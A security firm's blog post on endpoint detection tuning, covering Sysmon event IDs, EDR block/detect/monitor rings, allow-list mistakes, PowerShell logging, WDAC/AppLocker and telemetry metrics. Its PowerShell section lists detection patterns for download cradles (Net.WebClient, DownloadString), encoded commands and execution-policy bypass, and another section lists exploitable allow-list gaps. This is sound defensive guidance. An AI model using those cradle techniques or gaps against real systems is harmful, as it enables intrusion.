Endpoint Detection Tuning: Sysmon Config, EDR Policy, Allow-List Hygiene
Cybersecurity
Endpoint visibility is the single highest value SOC investment, and also the easiest to misconfigure into uselessness. A practical tour through Sysmon config tuning, EDR policy ladders, and allowlist hygiene that does not become an attacker's gift.
By Arjun Raghavan, Security & Systems Lead, BIPI · September 20, 2023 · 11 min read
Endpoint telemetry is where most modern detections live. T1059 command and scripting interpreter, T1003 credential dumping, T1055 process injection, T1547 boot or logon persistence: none of them are reliably detectable without endpoint visibility. And yet most environments run Sysmon with a stale config from 2019 and EDR in monitor only mode because somebody once had a false positive.
Sysmon Config as Code
Olaf Hartong's sysmon-modular and SwiftOnSecurity's sysmon-config remain the two reference configurations for production Sysmon deployments. Both are excellent starting points. Neither should be deployed unmodified. The right approach is to fork one, add environment specific exclusions to your forked branch, version control the XML, and deploy via GPO or your endpoint management tool with a tag that includes the config version.
- Event ID 1 process creation: required for nearly every behavioral detection, exclude only signed Microsoft binaries with no command line argument variation
- Event ID 3 network connection: high volume but essential for C2 detection, scope by destination port and process
- Event ID 7 image loaded: enables T1574 hijack execution flow detection, expensive but worth it for sensitive endpoints
- Event ID 10 process access: required for T1003.001 LSASS dumping detection, do not skip
- Event ID 11 file create: needed for staging and exfil detection, scope by directory
- Event ID 13 registry value set: enables persistence detection, focus on Run keys and image hijacks
- Event ID 22 DNS query: high volume, but invaluable for C2 hunting, retain at least 30 days
EDR Policy Ladders
EDR vendors all support a policy ladder from monitor to detect to block. The mistake is deploying every rule at the same level. Build at least three rings. Ring one: high confidence, low false positive rules like T1003.001 LSASS dumping run in block mode across the fleet. Ring two: medium confidence rules in detect mode with alerting. Ring three: experimental rules in monitor mode with output to a hunting index. Promote between rings based on measured false positive rate, not vendor recommendation.
Common Allowlist Failures
- Allowlisting by filename: an attacker can drop a binary named the same thing, especially in user writable paths
- Allowlisting by path without signature check: any binary in C colon backslash temp can now run unscrutinized
- Allowlisting a signing certificate that is also used by widely available third party tools, including offensive ones
- Allowlisting interactive process tools like PsExec, WMI, or PowerShell remoting wholesale
PowerShell Specifically
PowerShell is too valuable for administrators to block and too dangerous to ignore. The right configuration uses Constrained Language Mode on workstations, AMSI enabled and logging at script block level, module logging for the modules that matter, and transcript logging to a central share. Detections then run against event ID 4104 script block logs with rules targeting common offensive patterns: encoded commands, hidden window flags, download cradle strings like Net.WebClient and DownloadString, and execution policy bypass.
WDAC and AppLocker as Force Multipliers
Windows Defender Application Control and AppLocker, properly configured, prevent the execution of unsigned code in user writable paths, which kills most living off the land binary abuse and most T1027 obfuscated payload techniques. The deployment is genuinely hard and breaks legitimate use cases, so do it in audit mode for at least 90 days on a pilot ring before enforcement. The detection value of audit mode events alone is substantial.
EDR Tamper Protection
- Tamper protection must be enabled and tested by attempting to stop the EDR service from an elevated context
- Sysmon driver must be configured to prevent unloading except by authorized signed binaries
- Alerts must fire when EDR or Sysmon stop reporting from an endpoint, with a five minute threshold maximum
- A monthly audit should list endpoints whose telemetry has gaps, with reason and remediation owner
Endpoint visibility is asymmetric: it costs the SOC weeks to deploy and tune, and saves the SOC months when an actual incident lands. Anyone arguing for less visibility has not run a real IR.
Measurement
Track three numbers monthly. Percent of endpoints reporting Sysmon in the last 24 hours, target above 98. Percent of endpoints with EDR at policy enforce ring one or higher, target 100. Mean time between EDR agent failure and remediation, target under 48 hours. These three metrics, more than any detection count, predict whether the SOC will catch the next intrusion.
Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.